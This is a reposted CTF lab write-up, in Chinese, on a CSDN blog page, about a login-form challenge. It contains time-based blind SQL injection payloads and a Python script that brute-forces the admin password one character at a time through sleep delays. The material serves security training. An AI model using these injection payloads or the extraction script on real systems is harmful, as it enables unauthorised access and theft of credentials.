看起来有点难

最新推荐文章于 2024-08-26 00:02:11 发布
最新推荐文章于 2024-08-26 00:02:11 发布
阅读量77 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/wosun/p/11192516.html
版权

页面很简单,跟我们平时遇到的登录窗口差不多,看看源码,没什么可用的信息

bp抓一下,传repeatergo一下,也没看到什么特别的地方,看来这道题应该是注入题了,尝试用户名1,1’,1”,1#,1’#,1”#,1),1’),1”),1’)#,admin......,其中发现输入admin1’时就不一样了

多次尝试后发现这里是延时注入,所以构造payloadadmin' and sleep(10) and '1'='1

发现真延迟了10s,因为延时注入太麻烦了,所以这里直接引入dalaourlhttps://blog.csdn.net/dongyanwen6036/article/details/77840791)的脚本跑一下

#-*-coding:utf-8-*-

import requests

import time

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}*' #不区分大小写的

flag = ""

key=0

print("Start")

for i in range(1,50):

if key == 1:

break

for payload in payloads:

starttime = time.time()#记录当前时间

headers = {"Host": "ctf5.shiyanbar.com",

"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",

"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",

"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",

"Accept-Encoding": "gzip, deflate",

"Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour",

"Connection": "keep-alive",

}

url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(substr(password,%s,1)='%s') then sleep(10) else sleep(0) end and ''='&pass=&action=login" %(i,payload)#数据库

res = requests.get(url, headers=headers)

if time.time() - starttime > 10:

flag += payload

print("pwd is:%s"%flag)

break

else:

if payload == '*':

key = 1

break

print('[Finally] current pwd is %s'% flag)

得到password

再回到网页输入admin和我们得到的password就可用得到flag

 

转载于:https://www.cnblogs.com/wosun/p/11192516.html

weixin_30666943
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验吧-看起来有点
Gunther的博客
09-04 4857
看起来有点 直接啊,时间注入测试搞一下就知道,输入地址栏: http://ctf5.shiyanbar.com/basic/inject/index.php?username=admin' and sleep(10) and ''='&pass=&action=login 发现有延迟,sleep起作用了。 这句话好理解,记录一下。注意:对于普通的get注入,如果是字符型,前加'
实验吧——WEB-看起来有点
迷风小白
04-15 2633
看起来有点 用户名:123 密码:123 显示数据库连接失败 用户名:admin 密码:admin 显示登录失败,错误的用户名和密码 结合两次输入回显的内容,我们可以猜测用户名应该是admin,而密码暂时还不知道。 然后测试一下sql注入 admin=admin' union select 1,2,3 --+&pass=admin&action=login 发现被过滤了se...
实验吧——web之“看起来有点”详解
酒醉浮生的博客
11-13 408
链接: 题目链接:http://www.shiyanbar.com/ctf/2 解题链接:http://ctf5.shiyanbar.com/basic/inject/ 工具:kali(sqlmap) 解题思路及方法: 首先进入题目链接,看到这个分值,不禁让我很担心,这还是我第一个50分值的题目,而且度也是,给的说明也是那么霸气。。。。。。。 这些信息都在向我们透露这题的度,...
我只是看起来很努力
爱开发
03-14 3847
01刚当程序员时,我是属于那种勤勤恳恳类型的员工,工作态度用认真来形容不为过,每天我几乎是团队里最早到公司,又最晚下班的一个。而组员张工一般情况下都是准时上下班的,即使项目进度比较紧急,他也很少加班,除非是有特殊情况,他才加班。 要是按勤奋程度和工作时间长短来衡量,我想我比张工积极多了。按理说,我这么积极,工作量应该比张工多才对,其实不然,领导安排给我的工作任务和张工的任务相比,我比他还要少。 张
Java学起来到底有多
Jsono8的博客
03-17 2253
作为一个用 Java 十几年的老程序员来说几句。学Java对新人来说确实有点,但是如果新人知道了正确学习方法,学习效果就会好得多。接下来我就尝试总结一下。 一、Java内容太多,要避开那些“没有用知识” 确实,Java 的知识体系繁冗复杂,比较“全家桶”不是白叫的。但是这其中很多知识点不建议学,因为这些知识工作中很少用到,相关岗位很少,面试很少问到。例如下面这些: Java 的桌面 GUI 相关技术,包括:AWT、Swing、SWT/JFACE、JavaFx、JavaFx2 Java 的 XML
现场拔网线!第四范式版GPT能力首秀,有点不一样
04-26
再来看下以文生图的能力,先让它画一下“狮子头”: 不看出,生成图片的效果是过关的;此时现场很多人立即开口说到:“红烧狮子头”呢? 第四范式不在怕的,马上在现场演示了起来: 接下来,是代码生成方面,第...
BigReactorSimulator:用于BigReactors mod的WIP模拟器,用于模拟温度,不同模式的效率。还没做完
03-18
没有模拟自动取款机,因为泰铢有点 预览:(没有模拟atm ...只是使视图看起来不错;)可能很快就会开始制作模拟器...但是我有点不得不将整个java mod转换为c# 怎么运行的 有一个称为“ TileControl”的User...
Logo-Background:包含徽标的 div 的 jQuery 背景颜色插件
06-09
这个插件解决方案完全不同,因为其目的是通过使背景看起来像徽标的边框而不是主色,使徽标看起来像是包含在页面上。算法方案用:基本用法: < script src =" jquery.min.js " > </ script >< script...
用纯CSS实现饼状Loading等待图效果
12-13
之前碰到一个小练习,就是用纯CSS3来写饼状的loading效果,之前着实没有写过这玩意儿,小花完全没头绪,然后参考了张鑫旭老师的CSS3实现鸡蛋饼饼状图loading等待转转转,还有些别的东西,用一种看起来有一点类似但是...
Android代码-FractionView
08-06
,其实是逆时针转向,在gif截图上看起来有点卡,其实在手机上很流畅,没有卡顿 有兴趣的也可以看看我之前写的自定义组件 自定义view实现的下载进度展示:https://github.com/7449/ProgressView 自定义view实现的...
推荐一个完全自由的目录设计网站
qq_30049249的博客
08-22 445
因此,如果想在网站上写一本自己的书,我们需要一个目录设计的工具。现在,我们点击全部,看到自己的所有文章。这样,先创建各级栏目,再将文章拖动到各级栏目,就实现了对文章到整理。上面的链接提供参考,这里主要介绍其中的目录设计工具,也叫栏目设计。好,现在我们来出一本书,想一个名字,就叫《学习PHP动态网站开发》如果我们能通过网站出一本书,这将是一件很酷的事。事实上,我们通过网站发布知识,最常见的是写博客。先点击所有,查看子栏目和文章,然后进行拖动排序。好,本文说的是完全自由的目录设计,有多自由呢?
day32(8/20)——playbook剧本安装nginx、roles
wh992610的博客
08-21 868
roles(⻆⾊): 就是通过分别将variables, tasks及handlers等放置于单独的⽬录中,并可以便捷地调⽤它们的⼀种机制。假设我们要写⼀个playbook来安装管理lamp环境,那么这个playbook就会写很⻓。所以我们希望把这个很⼤的⽂件分成多个功能拆分, 分成apache管理,php管理,mysql管理,然后在需要使⽤的时候直接调⽤就可以了,以免重复写。就类似编程⾥的模块化的概念,以达到代码复⽤的效果。
linux基本指令
m0_64450406的博客
08-20 714
vi/vim有三种基本模式:普通模式(Normal Mode)、插入模式(Insert Mode)和命令行模式(Command-line Mode)。-t 或 --date=时间:使用指定的时间(而不是当前时间)来设置文件的访问和修改时间。-d 或 --date=字符串:使用指定的字符串来设置文件的访问和修改时间。进入vi/vim:在终端中输入vi或vim后跟文件名,如果文件不存在,将创建该文件。-r 或 --reference=文件:使用指定文件的访问和修改时间来更新目标文件的访问和修改时间。
web渗透测试 学习导图
qq_48368964的博客
08-20 949
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
更换域名后图片不显示
weixin_52675595的博客
08-22 236
一、2.3.2版本以下版本:可以使用命令行:php think reset:imagePath http://old.com --url http://new.com。原因:系统中图片是带域名存储在数据的,所以更换域名后,图片地址还是以前的域名,所以访问不到;可以替换部分图片的地址,但是还有部能替换的只能重新上传图片,或者完善这个命令。以下两个方法都是只能更换部分图片,并不是全部的,所以域名更换需谨慎。平台 - 维护 - 安全维护 - 清楚缓存 更换域名。问题:系统更换域名后,图片不显示了;
wp-autopost-pro 3.7.8最新完美版
jiyc2008的博客
08-25 65
插件是wp-autopost-pro 3.7.8最新版本。采集插件适用对象1、刚建的wordpress站点内容比较少,希望尽快有比较丰富的内容;2、热点内容自动采集并自动发布;3、定时采集,手动采集发布或保存到草稿;4、css样式规则,能更精确的采集需要的内容。5、伪原创与翻译、代理IP进行采集、保存Cookie记录;6、可采集内容到自定义栏目代码下载。
文件包含漏洞案例
最新发布
m0_62903168的博客
08-26 94
根据源代码来看,filter、zip、phar、data等伪协议都被过滤了。但php://input这个伪协议没有被过滤,我们可以在这里做文章。先用dir看看目录,发现有flag,然后直接读取出来就行。
【Redis】Redis线程与IO模型—(三)
smile_sundays的博客
08-20 2605
同时,Redis 在对事件队列中的事件进行处理时,会调用相应的处理函数,这就实现了基于事件的回调。类似的,当 Redis 通过 recv() 从一个客户端读取数据时,如果数据一直没有到达,Redis 也会一直阻塞在 recv(),这就导致 Redis 整个线程阻塞,无法处理其他客户端请求,效率很低。通常说 Redis 是单线程,主要是指 Redis 的网络 IO 和键值对读写是由一个线程来完成的,其他功能,比如持久化、异步删除、集群数据同步等,是由额外的线程执行的,所以严格来说,Redis 并不是单线程。
设备运维故障排查与修复技巧
一去二三里...的博客
08-22 1005
运维中最常见的个故障问题及其解决方法
echarts饼图看起来有点
08-24
您可以尝试调整饼图的宽高比例来改变其外观。在 ECharts 中,您可以使用 `series.pie.roseType` 属性来控制饼图的展示...通过设置不同的半径大小,您可以使饼图看起来更突出或更扁平。 希望这些提示能对您有所帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值